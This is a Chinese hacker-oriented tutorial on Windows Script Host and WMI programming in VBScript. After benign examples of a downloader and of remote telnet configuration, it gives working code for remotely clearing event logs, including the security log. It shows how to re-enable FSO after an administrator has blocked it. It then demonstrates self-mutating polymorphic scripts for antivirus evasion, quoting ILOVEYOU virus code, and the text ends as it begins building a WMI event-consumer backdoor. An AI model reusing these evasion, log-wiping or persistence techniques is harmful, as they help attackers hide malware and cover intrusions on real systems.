深入挖掘Windows腳本技術
阿新 • • 發佈:2018-12-22
不知道 閱讀 怎麽 語句 pen 是你 bin 對象的訪問 萬能 【目錄】
1,前言
2,回顧WSH對象
3,WMI服務
4,腳本也有GUI
5,反查殺
6,來做個後門
7,結語
8,參考資料
【前言】
本文講述一些Windows腳本編程的知識和技巧。這裏的Windows腳本是指"Windows Script Host"(WSH Windows腳本宿主),而不是HTML或ASP中的腳本。前者由Wscript或Cscript解釋,後兩者分別由IE和IIS負責解釋。描述的語言是VBScript。本文假設讀者有一定的Windows腳本編程的基礎。如果你對此還不了解,請先學習《Windows腳本技術》[1]。
【回顧WSH對象】
得益於com技術的支持,WSH能提供比批處理(.bat)更強大的功能。說白了,wsh不過是調用現成的“控件”作為一個對象,用對象的屬性和方法實現目的。
常用的對象有:
WScript
Windows腳本宿主對象模型的根對象,要使用WSH自然離不開它。它提供多個子對象,比如WScript.Arguments和WScript.Shell。前者提供對整個命令行參數集的訪問,後者可以運行程序、操縱註冊表內容、創建快捷方式或訪問系統文件夾。
Scripting.FileSystemObject
主要為IIS設計的對象,訪問文件系統。這個恐怕是大家遇到最多的對象了,因為幾乎所有的Windows腳本病毒都要通過它復制自己感染別人。
ADODB.Stream
ActiveX Data Objects數據庫的子對象,提供流方式訪問文件的功能。這雖然屬於數據庫的一部分,但感謝微軟,ADO是系統自帶的。
Microsoft.XMLHTTP
為支持XML而設計的對象,通過http協議訪問網絡。常用於跨站腳本執行漏洞和SQL injection。
還有很多不常見的:
活動目錄服務接口(ADSI)相關對象 —— 功能涉及範圍很廣,主要用於Windows域管理。
InternetExplorer對象 —— 做IE能做的各種事。
Word,Excel,Outlook對象 —— 用來處理word文檔,excel表單和郵件。
WBEM對象 —— WBEM即Web-Based Enterprise Management。它為管理Windows提供強大的功能支持。下一節提到的WMI服務提供該對象的接口。
很顯然,WSH可以利用的對象遠遠不止這些。本文掛一漏萬,談一些較實用的對象及其用法。
先看一個支持斷點續傳下載web資源的例子,它用到了上面說的4個常用對象。
if (lcase(right(wscript.fullname,11))="wscript.exe") then ‘判斷腳本宿主的名稱‘
die("Script host must be CScript.exe.") ‘腳本宿主不是CScript,於是就die了‘
end if
if wscript.arguments.count<1 then ‘至少要有一個參數‘
die("Usage: cscript webdl.vbs url [filename]") ‘麻雀雖小五臟俱全,Usage不能忘‘
end if
url=wscript.arguments(0) ‘參數數組下標從0開始‘
if url="" then die("URL can‘t be null.") ‘敢唬我,空url可不行‘
if wscript.arguments.count>1 then ‘先判斷參數個數是否大於1‘
filename=wscript.arguments(1) ‘再訪問第二個參數‘
else ‘如果沒有給出文件名,就從url中獲得‘
t=instrrev(url,"/") ‘獲得最後一個"/"的位置‘
if t=0 or t=len(url) then die("Can not get filename to save.") ‘沒有"/"或以"/"結尾‘
filename=right(url,len(url)-t) ‘獲得要保存的文件名‘
end if
if not left(url,7)="http://" then url=&qu ... t;&url ‘如果粗心把“http://”忘了,加上'
set fso=wscript.createobject("Scripting.FileSystemObject") ‘FSO,ASO,HTTP三個對象一個都不能少‘
set aso=wscript.createobject("ADODB.Stream")
set http=wscript.createobject("Microsoft.XMLHTTP")
if fso.fileexists(filename) then ‘判斷要下載的文件是否已經存在‘
start=fso.getfile(filename).size ‘存在,以當前文件大小作為開始位置‘
else
start=0 ‘不存在,一切從零開始‘
fso.createtextfile(filename).close ‘新建文件‘
end if
wscript.stdout.write "Connectting..." ‘好戲剛剛開始‘
current=start ‘當前位置即開始位置‘
do
http.open "GET",url,true ‘這裏用異步方式調用HTTP‘
http.setrequestheader "Range","bytes="&start&"-"&cstr(start+20480) ‘斷點續傳的奧秘就在這裏‘
http.setrequestheader "Content-Type:","application/octet-stream"
http.send ‘構造完數據包就開始發送‘
for i=1 to 120 ‘循環等待‘
if http.readystate=3 then showplan() ‘狀態3表示開始接收數據,顯示進度‘
if http.readystate=4 then exit for ‘狀態4表示數據接受完成‘
wscript.sleep 500 ‘等待500ms‘
next
if not http.readystate=4 then die("Timeout.") ‘1分鐘還沒下完20k?超時!‘
if http.status>299 then die("Error: "&http.status&" "&http.statustext) ‘不是吧,又出錯?‘
if not http.status=206 then die("Server Not Support Partial Content.") ‘服務器不支持斷點續傳‘
aso.type=1 ‘數據流類型設為字節‘
aso.open
aso.loadfromfile filename ‘打開文件‘
aso.position=start ‘設置文件指針初始位置‘
aso.write http.responsebody ‘寫入數據‘
aso.savetofile filename,2 ‘覆蓋保存‘
aso.close
range=http.getresponseheader("Content-Range") ‘獲得http頭中的"Content-Range"‘
if range="" then die("Can not get range.") ‘沒有它就不知道下載完了沒有‘
temp=mid(range,instr(range,"-")+1) ‘Content-Range是類似123-456/789的樣子‘
current=clng(left(temp,instr(temp,"/")-1)) ‘123是開始位置,456是結束位置‘
total=clng(mid(temp,instr(temp,"/")+1)) ‘789是文件總字節數‘
if total-current=1 then exit do ‘結束位置比總大小少1就表示傳輸完成了‘
start=start+20480 ‘否則再下載20k‘
loop while true
wscript.echo chr(13)&"Download ("&total&") Done." ‘下載完了,顯示總字節數‘
function die(msg) ‘函數名來自Perl內置函數die‘
wscript.echo msg ‘交代遺言^_^‘
wscript.quit ‘去見馬克思了‘
end function
function showplan() ‘顯示下載進度‘
if i mod 3 = 0 then c="/" ‘簡單的動態效果‘
if i mod 3 = 1 then c="-"
if i mod 3 = 2 then c="/"
wscript.stdout.write chr(13)&"Download ("¤t&") "&c&chr(8)‘13號ASCII碼是回到行首,8號是退格‘
end function
可以看到,http控件的功能是很強大的。通過對http頭的操作,很容易就實現斷點續傳。例子中只是單線程的,事實上由於http控件支持異步調用和事件,也可以實現多線程下載。在MSDN裏有詳細的用法。至於斷點續傳的詳細資料,請看RFC2616。
FSO和ASO都可以訪問文件,他們有什麽區別呢?其實,ASO除了在訪問字節(非文本)數據有用外,就沒有存在的必要了。如果想把例子中的ASO用FSO來實現,那麽寫入http.responsebody的時候會出錯。反之也不行,ASO無法判斷文件是否存在。如果文件不存在,loadfromfile就直接出錯,沒有改正的機會。當然,可以用on error resume next語句讓腳本宿主忽略非致命錯誤,自己捕捉並處理。但有現成的fileexists()為什麽不用呢?
另外,由於FSO經常被腳本病毒和ASP木馬利用,所以管理員可能會在註冊表中修改該控件的信息,使腳本無法創建FSO。其實執行一個命令regsvr32 /s scrrun.dll就恢復了。即使scrrun.dll被刪除,自己復制一個過去就行。
熱身完之後,下面我們來看一個功能強大的對象——WBEM(由WMI提供)。
【WMI服務】
先看看MSDN裏是怎麽描述WMI的——Windows 管理規範 (WMI) 是可伸縮的系統管理結構,它采用一個統一的、基於標準的、可擴展的面向對象接口。我在剛開始理解WMI的時候,總以為WMI是"Windows管理接口"(Interface),呵呵。
再看什麽是WMI服務——提供共同的界面和對象模式以便訪問有關操作系統、設備、應用程序和服務的管理信息。如果此服務被終止,多數基於Windows的軟件將無法正常運行。如果此服務被禁用,任何依賴它的服務將無法啟動。
看上去似乎是個很重要的服務。不過,默認情況下並沒有服務依賴它,反而是它要依賴RPC和EventLog服務。但它又是時常用到的。我把WMI服務設置為手動啟動並停止,使用電腦一段時間,發現WMI服務又啟動了。被需要就啟動,這是服務設置為“手動”的特點。當我知道WMI提供的管理信息有多龐大後,對WMI服務的自啟動就不感到奇怪了。
想直觀了解WMI的復雜,可以使用WMITools.exe[2]這個工具。這是一個工具集。使用其中的WMI Object Browser可以看到很多WMI提供的對象,其復雜程度不亞於註冊表。更重要的是,WMI還提供動態信息,比如當前進程、服務、用戶等。
WMI的邏輯結構是這樣的:
首先是WMI使用者,比如腳本(確切的說是腳本宿主)和其他用到WMI接口的應用程序。由WMI使用者訪問CIM對象管理器WinMgmt(即WMI服務),後者再訪問CIM(公共信息模型Common Information Model)儲存庫。靜態或動態的信息(對象的屬性)就保存在CIM庫中,同時還存有對象的方法。一些操作,比如啟動一個服務,通過執行對象的方法實現。這實際上是通過COM技術調用了各種dll。最後由dll中封裝的API完成請求。
WMI是事件驅動的,操作系統、服務、應用程序、設備驅動程序等都可作為事件源,通過COM接口生成事件通知。WinMgmt捕捉到事件,然後刷新CIM庫中的動態信息。這也是為什麽WMI服務依賴EventLog的原因。
說完概念,我們來看看具體如何操作WMI接口。
下面這個例子的代碼來自我寫的腳本RTCS。它是遠程配置telnet服務的腳本。
這裏只列出關鍵的部分:
首先是創建對象並連接服務器:
set objlocator=createobject("wbemscripting.swbemlocator")
set objswbemservices=objlocator.connectserver(ipaddress,"root/default",username,password)
第一句創建一個服務定位對象,然後第二句用該對象的connectserver方法連接服務器。
除了IP地址、用戶名、密碼外,還有一個名字空間參數root/default。
就像註冊表有根鍵一樣,CIM庫也是分類的。用面向對象的術語來描述就叫做“名字空間”(Name Space)。
由於RTCS要處理NTLM認證方式和telnet服務端口,所以需要訪問註冊表。而操作註冊表的對象在root/default。
set objinstance=objswbemservices.get("stdregprov") ‘實例化stdregprov對象‘
set objmethod=objinstance.methods_("SetDWORDvalue") ‘SetDWORDvalue方法本身也是對象‘
set objinparam=objmethod.inparameters.spawninstance_() ‘實例化輸入參數對象‘
objinparam.hdefkey=&h80000002 ‘根目錄是HKLM,代碼80000002(16進制)‘
objinparam.ssubkeyname="SOFTWARE/Microsoft/TelnetServer/1.0" ‘設置子鍵‘
objinparam.svaluename="NTLM" ‘設置鍵值名‘
objinparam.uvalue=ntlm ‘設置鍵值內容,ntlm是變量,由用戶輸入參數決定‘
set objoutparam=objinstance.execmethod_("SetDWORDvalue",objinparam) ‘執行方法‘
然後設置端口
objinparam.svaluename="TelnetPort"
objinparam.uvalue=port ‘port也是由用戶輸入的參數‘
set objoutparam=objinstance.execmethod_("SetDWORDvalue",objinparam)
看到這裏你是不是覺得有些頭大了呢?又是名字空間,又是類的實例化。我在剛開始學習WMI的時候也覺得很不習慣。記得我的初中老師說過,讀書要先把書讀厚,再把書讀薄。讀厚是因為加入了自己的想法,讀薄是因為把握要領了。
我們現在就把書讀薄。上面的代碼可以改為:
set olct=createobject("wbemscripting.swbemlocator")
set oreg=olct.connectserver(ip,"root/default",user,pass).get("stdregprov")
HKLM=&h80000002
out=oreg.setdwordvalue(HKLM,"SOFTWARE/Microsoft/TelnetServer/1.0","NTLM",ntlm)
out=oreg.setdwordvalue(HKLM,"SOFTWARE/Microsoft/TelnetServer/1.0","TelnetPort",port)
現在是不是簡單多了?
接著是對telnet服務狀態的控制。
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
set colinstances=objswbemservices.execquery("select * from win32_service where name=‘tlntsvr‘")
這次連接的是root/cimv2名字空間。然後采用wql(sql for WMI)搜索tlntsvr服務。熟悉sql語法的一看就知道是在做什麽了。這樣得到的是一組Win32_Service實例,雖然where語句決定了該組總是只有一個成員。
為簡單起見,假設只要切換服務狀態。
for each objinstance in colinstances
if objinstance.started=true then ‘根據started屬性判斷服務是否已經啟動‘
intstatus=objinstance.stopservice() ‘是,調用stopservice停止服務‘
else
intstatus=objinstance.startservice() ‘否,調用startservice啟動服務‘
end if
next
關鍵的代碼就是這些了,其余都是處理輸入輸出和容錯的代碼。
總結一下過程:
1,連接服務器和合適的名字空間。
2,用get或execquery方法獲得所需對象的一個或一組實例。
3,讀寫對象的屬性,調用對象的方法。
那麽,如何知道要連接哪個名字空間,獲得哪些對象呢?《WMI技術指南》[3]中分類列出了大量常用的對象。可惜它沒有相應的電子書,你只有到書店裏找它了。你也可以用WMITools裏WMI CIM Studio這個工具的搜索功能,很容易就能找想要的對象。找到對象後,WMI CIM Studio能列出其屬性和方法,然後到MSDN裏找具體的幫助。而應用舉例,除了我寫的7個RS系列腳本,還有參考資料[4]。
需要特別說明的是,在參考資料[4]中,連接服務器和名字空間用的是類似如下的語法:
Set objWMIService=GetObject("winmgmts:{impersonationLevel=impersonate}!//"&strComputer&"/root/cimv2:Win32_Process")
詳細的語法在《WMI技術指南》和MSDN中有介紹,但我們不關心它,因為這種辦法沒有用戶名和密碼參數。 因此,只有在當前用戶在目標系統(含本地)有登陸權限的情況下才能使用。而connectserver如果要本地使用,第一個參數可以是127.0.0.1或者一個點".",第3、4個參數都是空字符串""。
最後,訪問WMI還有一個“特權”的問題。如果你看過ROTS的代碼,你會發現有兩句“奇怪”的語句:
objswbemservices.security_.privileges.add 23,true
objswbemservices.security_.privileges.add 18,true
這是在向WMI服務申請權限。18和23都是權限代號。下面列出一些重要的代號:
5 在域中創建帳戶
7 管理審計並查看、保存和清理安全日誌
9 加載和卸載設備驅動
10 記錄系統時間
11 改變系統時間
18 在本地關機
22 繞過歷遍檢查
23 允許遠程關機
詳細信息還是請看《WMI技術指南》或MSDN。
所有特權默認是沒有的。我在寫RCAS時,因為忘了申請特權11,結果一直測試失敗,很久才找到原因。
只要有權限連接WMI服務,總能成功申請到需要的特權。這種特權機制,只是為了約束應用程序的行為,加強系統穩定性。有點奇怪的是,訪問註冊表卻不用申請任何特權。真不知道微軟的開發人員是怎麽想的,可能是訪問註冊表太普遍了。
【腳本也有GUI】
雖然系統提供了WScript和CScript兩個腳本宿主,分別負責窗口環境和命令行環境下的腳本運行,但實際上窗口環境下用戶與腳本交互不太方便:參數輸入只能建立快捷方式或彈出InputBox對話框,輸出信息後只有在用戶“確定”後才能繼續運行。完全沒有了窗口環境直觀、快捷的優勢。好在有前面提到的InternetExplorer對象,腳本可以提供web風格的GUI。
還是來看個例子,一個清除系統日誌的腳本,順便復習一下WMI:
set ie=wscript.createobject("internetexplorer.application","event_") ‘創建ie對象‘
ie.menubar=0 ‘取消菜單欄‘
ie.addressbar=0 ‘取消地址欄‘
ie.toolbar=0 ‘取消工具欄‘
ie.statusbar=0 ‘取消狀態欄‘
ie.width=400 ‘寬400‘
ie.height=400 ‘高400‘
ie.resizable=0 ‘不允許用戶改變窗口大小‘
ie.navigate "about:blank" ‘打開空白頁面‘
ie.left=fix((ie.document.parentwindow.screen.availwidth-ie.width)/2) ‘水平居中‘
ie.top=fix((ie.document.parentwindow.screen.availheight-ie.height)/2) ‘垂直居中‘
ie.visible=1 ‘窗口可見‘
with ie.document ‘以下調用document.write方法,‘
.write "<html><body bgcolor=#dddddd scroll=no>" ‘寫一段html到ie窗口中。‘
.write "<h2 align=center>遠程清除系統日誌</h2><br>"
.write "<p>目標IP:<input id=ip type=text size=15>" ‘也可以用navigate方法直接打開一‘
.write "<p>用戶名:<input id=user type=text size=30>" ‘個html文件,效果是一樣的。‘
.write "<p>密碼: <input id=pass type=password size=30>"
.write "<p align=center>類型:" ‘不僅是input對象,所有DHTML支持‘
.write "<input id=app type=checkbox>應用程序 " ‘的對象及其屬性、方法都可以使用。‘
.write "<input id=sys type=checkbox>系統 "
.write "<input id=sec type=checkbox>安全" ‘訪問這些對象的辦法和網頁中訪問‘
.write "<p align=center><br>" ‘框架內對象是類似的。‘
.write "<input id=confirm type=button value=確定> "
.write "<input id=cancel type=button value=取消>"
.write "</body></html>"
end with
dim wmi ‘顯式定義一個全局變量‘
set wnd=ie.document.parentwindow ‘設置wnd為窗口對象‘
set id=ie.document.all ‘設置id為document中全部對象的集合‘
id.confirm.onclick=getref("confirm") ‘設置點擊"確定"按鈕時的處理函數‘
id.cancel.onclick=getref("cancel") ‘設置點擊"取消"按鈕時的處理函數‘
do while true ‘由於ie對象支持事件,所以相應的,‘
wscript.sleep 200 ‘腳本以無限循環來等待各種事件。‘
loop
sub event_onquit ‘ie退出事件處理過程‘
wscript.quit ‘當ie退出時,腳本也退出‘
end sub
sub cancel ‘"取消"事件處理過程‘
ie.quit ‘調用ie的quit方法,關閉IE窗口‘
end sub ‘隨後會觸發event_onquit,於是腳本也退出了‘
sub confirm ‘"確定"事件處理過程,這是關鍵‘
with id
if .ip.value="" then .ip.value="." ‘空ip值則默認是對本地操作‘
if not (.app.checked or .sys.checked or .sec.checked) then ‘app等都是checkbox,通過檢測其checked‘
wnd.alert("至少選擇一種日誌") ‘屬性,來判斷是否被選中。‘
exit sub
end if
set lct=createobject("wbemscripting.swbemlocator") ‘創建服務器定位對象‘
on error resume next ‘使腳本宿主忽略非致命錯誤‘
set wmi=lct.connectserver(.ip.value,"root/cimv2",.user.value,.pass.value) ‘連接到root/cimv2名字空間‘
if err.number then ‘自己捕捉錯誤並處理‘
wnd.alert("連接WMI服務器失敗") ‘這裏只是簡單的顯示“失敗”‘
err.clear
on error goto 0 ‘仍然讓腳本宿主處理全部錯誤‘
exit sub
end if
if .app.checked then clearlog "application" ‘清除每種選中的日誌‘
if .sys.checked then clearlog "system"
if .sec.checked then clearlog "security" ‘註意,在XP下有限制,不能清除安全日誌‘
wnd.alert("日誌已清除")
end with
end sub
sub clearlog(name)
wql="select * from Win32_NTEventLogFile where logfilename=‘"&name&"‘"
set logs=wmi.execquery(wql) ‘註意,logs的成員不是每條日誌,‘
for each l in logs ‘而是指定日誌的文件對象。‘
if l.cleareventlog() then
wnd.alert("清除日誌"&name&"時出錯!")
ie.quit
wscript.quit
end if
next
end sub
總結一下整個過程。首先是創建internetexplorer.application對象。其直接的效果是啟動了一個iexplorer進程,但窗口是不可見的,直到設置了ie.visible=1。然後用document.write方法將html語句寫到ie窗口中。對於復雜的界面,可以將html代碼保存為一個html文件,用ie.navigate(filename)打開。最後是響應窗口中的輸入。這基本上屬於DHTML的知識範疇。
與一般腳本編程最大的不同之處,在於ie是事件驅動的。你所要做的,就是設置好相應的事件處理函數/過程。
在本例中,腳本只關心3個事件:ie退出,"確定"按鈕被點擊,"取消"按鈕被點擊。
註意,例子中只有兩句設置事件處理過程的語句,沒有定義ie退出事件與event_onquit過程關聯。這是因為這裏用到一個特性——創建ie對象時的第二個參數"event_"是一個前綴,ie對象的事件處理過程名是該前綴加事件名。所以onquit事件的處理過程默認就是event_onquit。
當點擊"確定"按鈕後,confirm過程被調用。例子中演示了如何訪問ie中的對象,比如ie.document.all.ip.value就是在"目標IP"文本框中的輸入。如果選中"應用程序"這個checkbox,那麽ie.document.all.app.checked的值是true,否則是false。想調用alert方法,則用ie.document.parentwindow.alert。其他各種ie內對象的訪問方法完全是類似的。具體的可以看DHTML相關資料。
有了web界面,交互就變得豐富多彩了。大家可以充分發揮創意。
比如,很多GUI工具(比如流光)啟動時,有一個logo頁,顯示版權等信息。我們用ie對象也可以模擬一個出來:
set ie=wscript.createobject("internetexplorer.application")
ie.fullscreen=1
ie.width=300
ie.height=150
ie.navigate "about:blank"
ie.left=fix((ie.document.parentwindow.screen.availwidth-ie.width)/2)
ie.top=fix((ie.document.parentwindow.screen.availheight-ie.height)/2)
ie.document.write "<body bgcolor =skyblue scroll=no><br><br>"&_
"<h2 align=center>這是一個Logo</h2></body>"
ie.visible=1
wscript.sleep 5000
ie.quit
上面這段代碼執行後,將在屏幕中央顯示一個連標題欄和邊框都沒有的ie窗口,持續5秒。
窗口裏是藍底黑字的“這是一個Logo”。
腳本GUI化之後,與用戶的交互更直觀。像Nmap那樣有很多參數的工具,在本地使用時,寫一個圖形界面的“接口”就一勞永逸了。輸出的結果也可以用腳本處理,以更適合閱讀的方式顯示,就像流光等工具能生成html掃描報告那樣。
【反查殺】
首先必須說明的是,我完全沒有試圖挑戰殺毒軟件殺毒能力的意思。Windows腳本是一種解釋性語言,明文保存代碼。由於沒有經過編譯過程,代碼的復雜程度遠不如可執行程序(exe)。exe做不到的事,沒理由指望腳本能做到。不過,正因為腳本的反查殺能力很差,以至於殺毒軟件使用的查殺辦法也不高級。於是我們就有機可乘了。
先看看常見的反查殺辦法:
1,字符串或語句的分割/重組。
最典型的例子就是將 fso=createobject("scripting.filesystemobject")
變成 fso=createobject("script"+"ing.filesyste"+"mobject")
這種辦法的擴展是用execute語句:
execute("fso=crea"+"teobject(""scr"+"ipting.filesy"+"stemobject"")")
2,變量名自動改變。
Randomize
Set Of = CreateObject("Scripting.FileSystemObject")
vC = Of.OpenTextFile(WScript.ScriptFullName, 1).Readall
fS = Array("Of", "vC", "fS", "fSC")
For fSC = 0 To 3
vC = Replace(vC, fS(fSC), Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65)) & Chr((Int(Rnd * 22) + 65)))
Next
Of.OpenTextFile(WScript.ScriptFullName, 2, 1).Writeline vC
上面這段代碼取自愛蟲病毒,大家運行一下,就知道是怎麽回事了。
3,用官方工具——腳本編碼器screnc.exe[5]加密腳本。
加密後的腳本能被腳本宿主直接解釋。本來這是最好的解決辦法,但“槍打出頭鳥”,由於加密是可逆的,現在所有的殺毒軟件都有解碼功能。因此這個辦法的效果基本上為零。
第一個辦法的有效告訴我們這樣一個事實:對腳本病毒的查殺基本上是屬於靜態的。而且,我發現即使只是改變大小寫,也能起到反查效果(只試了一種殺毒軟件)。反查殺的關鍵是減少特征碼。
對於exe的反查殺,最容易想到的就是“加殼”。在腳本上也可以應用這個辦法。比如:
str="cswpire.tohcO"" ""!K"
for i=1 to len(str) step 3
rev=rev+strreverse(mid(str,i,3))
next
execute rev
一個最簡單的“殼”。“殼”的算法是每n個字符反轉順序一次。n就是算法的“種子”,本例中它等於3。
這個“殼”是死的,起不到減少特征碼的效果。反而增加了特征碼,如"cswpire"。
下面看一個復雜些的例子:
str="wscript.echo ""OK!"":randomize:key=int(rnd*8+2):str=rev:str=replace(str,chr(34),chr(34)+chr(34)):set aso=createobject(""ADODB.Stream""):with aso:.open:.writetext ""str=""+chr(34)+str+chr(34)+"":key=""+cstr(key)+"":str=rev:execute str:function rev():for i=1 to len(str) step key:rev=rev+strreverse(mid(str,i,key)):next:end function"":.savetofile wscript.scriptfullname,2:end with":key=1:str=rev:execute str:function rev():for i=1 to len(str) step key:rev=rev+strreverse(mid(str,i,key)):next:end function
(註意,該代碼只有一行,沒有回車)
保存成vbs文件,雙擊執行,效果還是和前一段代碼一樣,彈出一個對話框顯示"OK!"。
但是,執行完後再看代碼,可能變成了這樣:
str="tpircsw"" ohce.ar:""!KOezimodnni=yek:8*dnr(trts:)2+ts:ver=alper=r,rts(ec)43(rhc43(rhc,3(rhc+)tes:))4rc=osa jboetaeDA""(tcertS.BDOw:)""maeosa hti:nepo.:tetirw.ts"" txerhc+""=rts+)43(3(rhc+rek:""+)4tsc+""=y+)yek(rr=rts:""cexe:verts etuitcnuf:(ver noi rof:)l ot 1=)rts(nek pets =ver:yerts+veresreverts(dim(yek,i,rtxen:))uf dne:""noitcntevas.:w elifo.tpircsftpircsemanllu dne:2,htiw":key=7:str=rev:execute str:function rev():for i=1 to len(str) step key:rev=rev+strreverse(mid(str,i,key)):next:end function
再執行,又變成其他樣子了。這個腳本是自變形的。
如果仔細看代碼就會發現,“殼”的算法依舊,而“種子”隨機改變。但是,加殼過的內容每次不同了,“殼”本身還是沒有任何改變。很多exe加殼工具加的殼,本身就被當作惡意代碼來提取特征碼。為了更好的反查殺,腳本的“殼”也需要動態改變。這就要用到所謂的多態技術。不過,exe的多態是用來反動態查殺的,而腳本的“多態”只是應付靜態查殺,兩者有很大不同。
對於exe,真正的多態目前還未聽說被實現的。腳本也只能做多少算多少。
不影響功能的變形方法,除了上面提到的3種,還有:
1,隨機改變大小寫;
2,冒號(:)與回車符隨機互換(字符串內和"then"之後的冒號除外);
3,字符串分割時,"+"與"&"隨機互換;
4,()+-*/&,等字符兩邊任意添加空格或續行符(_)和回車符的組合;
5,用自定義函數替換內置函數;即使自定義的函數只是簡單的封裝內置函數,但至少改變了關鍵字的位置。
…………
還有其他“多態”算法有待你的研究。
這些算法的應用,是以大幅增加代碼長度為前提的。如果想寫一個比較完美的“殼”,相信會涉及到“文法分析”的知識,因為腳本要“讀懂”自己,從而達到類似Java混淆器的效果,這就很復雜了,有機會再和大家探討。下面我們應用“語句分割”、“變量名自動改變”、“隨機大小寫”、“+和&互換”四種方法,看一下效果如何:
A001="wscript.echo ""OK!"":A004=chr(34):randomize:A005=int(rnd*24000+40960):A001=A006(A001):A000=A005 mod 10+2:A001=replace(A002,A004,A004&A004):set A007=createobject(""ADODB.Stream""):A007.open:A007.writetext hex(A005+1)&""=""&A004&A001&A004&A008("":execute ""&A004&A006(""A000=""&A000&"":A001=A002:execute A001:function A002():for A003=1 to len(A001) step A000:A002=A002+strreverse(mid(A001,A003,A000)):next:end function"")&A004):A007.savetofile wscript.scriptfullname,2:function A006(A009):for A00A=0 to 12:A009=replace(A009,hex(&HA000+A00A),hex(A005+A00A)):next:A006=A009:end function:function A008(A009):for A00A=1 to len(A009):A00B=mid(A009,A00A,1):if int(rnd*2-1) then A00B=ucase(A00B):end if:if A00A>11 and int(rnd*5)=0 then A008=A008&A004&chr(38+int(rnd*2)*5)&A004:end if:A008=A008&A00B:next:end function":A000=1:A001=A002:execute A001:function A002():for A003=1 to len(A001) step A000:A002=A002+strreverse(mid(A001,A003,A000)):next:end function
(註意,其中沒有回車符)
上面是“原版”的,保存為vbs文件雙擊運行,還是彈出對話框顯示"OK!"。再看代碼變形成什麽樣了(效果是隨機的):
B906="tpircsw"" ohce.9B:""!KO(rhc=90nar:)43:ezimodni=A09B2*dnr(t04+00049B:)069B09B=60:)609B(9B=509B dom A09B:2+01lper=6009B(eca,909B,79B&909Btes:)90c=C09B boetaerA""(tcejtS.BDOD:)""maerpo.C09BC09B:netetirw.xeh txe1+A09B(B&""=""&)09B&909&909B&6:""(D09Betucexe909B&"" ""(B09B&&""=509B:""&509B9B=609Bcexe:709B etucnuf:609B noitof:)(70=809B rel ot 1)609B(nB pets 09B:509+709B=7everrtsdim(esrB,609B(09B,809xen:))5f dne:tnoitcnu909B&)"".C09B:)fotevascsw elics.tpirluftpir2,emanlitcnuf:B09B no:)E09B(09B rof ot 0=FE09B:21calper=,E09B(eBH&(xeh09B+509(xeh,)F9B+A09Ben:))F0B09B:txe:E09B=cnuf dnuf:noit noitcn9B(D09Brof:)E01=F09B nel ot :)E09B(im=019B,E09B(d)1,F09Btni fi:-2*dnr(neht )1u=019B 9B(esacdne:)01 fi:fi 11>F09Bni dna 5*dnr(teht 0=)=D09B n9B&D09B(rhc&90(tni+83*)2*dnr909B&)5fi dne:B=D09B:19B&D09:txen:0nuf dnenoitc":EXecUTe "B9"&"05=7"&":B906"&"=B907:E"+"XEc"+"utE B906"+":FuN"&"ctIoN B9"&"07():fOr"+" B9"+"08=1 tO l"&"En(B906)"+" step B905:B907"&"=B907+"&"sTRreVErSe(MId("&"B9"&"0"&"6,B908,B905"&")"+"):N"+"eX"+"t"+":eNd fUN"&"CtiOn"
眼花了沒?再來一次:
F0CB="rcsw.tpiohceKO"" F:""!=EC0(rhc:)43dnarzimo0F:ei=FCr(tn2*dn0004904+:)06BC0FD0F=0F(0:)BCAC0FC0F=om F01 dF:2+=BC0lper(ecaCC0FC0F,0F,EF&EC)EC0tes:D0F rc=1etaeejbo""(tcDODAtS.BmaerF:)"".1D0nepoD0F:rw.1teti txe(xehFC0F&)1+&""=""EC0FC0F&0F&BF&EC(2D0xe:""tuce&"" eEC0FD0F&F""(0=AC00F&""""&ACC0F:0F=Be:CCucex etBC0Fnuf:oitc0F n)(CCrof:C0F 1=Dl otF(ne)BC0ets 0F pF:AC=CC0CC0Frts+ever(esr(dimBC0FC0F,0F,D))ACxen:ne:tuf ditcn)""noC0F&F:)E.1D0evasifotw elircss.tppircluftmanl:2,ecnufnoitD0F 0F(0:)3D rof4D0Ft 0=21 oD0F:er=3calp0F(eh,3D&(xeC0FH0F+A,)4D(xehFC0FD0F+:))4txenD0F:0F=0e:3Df dntcnu:noicnufnoitD0F 0F(2:)3D rof4D0Ft 1=el o0F(n:)3D5D0Fdim=D0F(0F,31,4Dfi:)tni dnr(1-2*ht )F ne=5D0sacu0F(e:)5D dnei:fi0F f1>4Dna 1ni dnr(t)5*dt 0= neh2D0FD0F=0F&2c&EC3(rhni+8nr(t)2*d&)5*EC0Fdne::fi 2D0FD0F=0F&2n:5D:txe dnecnufnoit":eXecUtE "F"+"0CA"&"=4:F0CB"+"="+"F0CC:eX"+"e"+"cUte F0CB"&":F"+"UNC"+"tIOn F0CC():F"+"or"+" F0"&"CD=1 tO LEN(F0CB) sTEp F0CA:F0CC=F0CC+strR"+"Ever"+"SE"&"(mID("+"F0CB,"+"F0CD,F0CA)):nEXT:eNd FU"&"nCTIo"&"N"
這樣夠了嗎?——不知道。也許殺毒引擎本來就是忽略大小寫的,本來就能自動連接字符串,本來就能“文法分析”……
這個“殼”有實用性嗎?——沒有。因為“殼”的算法太簡單。“種子”A000 = A005 mod 10 + 2,所以如果不考慮自動改變的變量名,加殼後的代碼只有10種樣子。
如何改進這個“殼”?——當然是用更復雜的算法,更多的“多態”。
如果你有興趣,可以先看那個“原版”的腳本代碼(把冒號都替換為回車,可讀性就比較好了),然後自己加強它。
當然,你也可以另起爐竈,自由展現你的創意。
【來做個後門】
在討論腳本後門前,先要介紹一類很有用的WMI對象。事實上,這才是本節的關鍵。腳本後門不過是它的一個應用而已。
前面已經說過,WMI是事件驅動的。整個事件處理機制分為四個部分:
1,事件生產者(provider):負責產生事件。WMI包含大量的事件生產者。有性能計數器之類的具體的事件生產者,也有類、實例的創建、修改、刪除等通用的事件生產者。
2,事件過濾器(filter):系統每時每刻都在產生大量的事件,通過自定義過濾器,腳本可以捕獲感興趣的事件進行處理。
3,事件消費者(consumer):負責處理事件。它可以是可執行程序、動態鏈接庫(dll,由WMI服務加載)或者腳本。
4,事件綁定(binding):通過將過濾器和消費者綁定,明確什麽事件由什麽消費者負責處理。
事件消費者可以分為臨時的和永久的兩類。臨時的事件消費者只在其運行期間關心特定事件並處理。永久消費者作為類的實例註冊在WMI名字空間中,一直有效直到它被註銷。顯然,永久事件消費者更具實用性。還是來看個例子:
nslink="winmgmts://./root/cimv2:" ‘只需要本地連接,所以用這種語法,不用swbemlocator對象‘
set asec=getobject(nslink&"ActiveScriptEventConsumer").spawninstance_ ‘創建“活動腳本事件消費者”‘
